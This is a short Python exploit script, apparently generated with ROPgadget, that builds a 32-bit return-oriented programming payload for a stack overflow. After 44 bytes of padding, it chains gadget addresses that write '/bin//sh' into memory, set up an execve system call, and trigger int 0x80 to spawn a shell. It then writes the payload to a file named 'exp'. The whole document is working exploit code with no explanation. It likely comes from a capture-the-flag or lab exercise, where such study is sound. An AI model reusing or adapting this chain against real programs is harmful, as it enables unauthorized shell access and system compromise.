#!/usr/bin/env python3
# execve generated by ROPgadget

from struct import pack

# Padding goes here
p = b'A' * 44

p += pack('<I', 0x0806e13b) # pop edx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x080a8cb6) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x08056bd5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e13b) # pop edx ; ret
p += pack('<I', 0x080da064) # @ .data + 4
p += pack('<I', 0x080a8cb6) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x08056bd5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e13b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x08056190) # xor eax, eax ; ret
p += pack('<I', 0x08056bd5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x0806e162) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080da060) # padding without overwrite ebx
p += pack('<I', 0x0806e13b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x08056190) # xor eax, eax ; ret
p += pack('<I', 0x0807ba0a) # inc eax ; ret
p += pack('<I', 0x0807ba0a) # inc eax ; ret
p += pack('<I', 0x0807ba0a) # inc eax ; ret
p += pack('<I', 0x0807ba0a) # inc eax ; ret
p += pack('<I', 0x0807ba0a) # inc eax ; ret
p += pack('<I', 0x0807ba0a) # inc eax ; ret
p += pack('<I', 0x0807ba0a) # inc eax ; ret
p += pack('<I', 0x0807ba0a) # inc eax ; ret
p += pack('<I', 0x0807ba0a) # inc eax ; ret
p += pack('<I', 0x0807ba0a) # inc eax ; ret
p += pack('<I', 0x0807ba0a) # inc eax ; ret
p += pack('<I', 0x080495f3) # int 0x80
out_file = open('exp', 'wb')
out_file.write(p)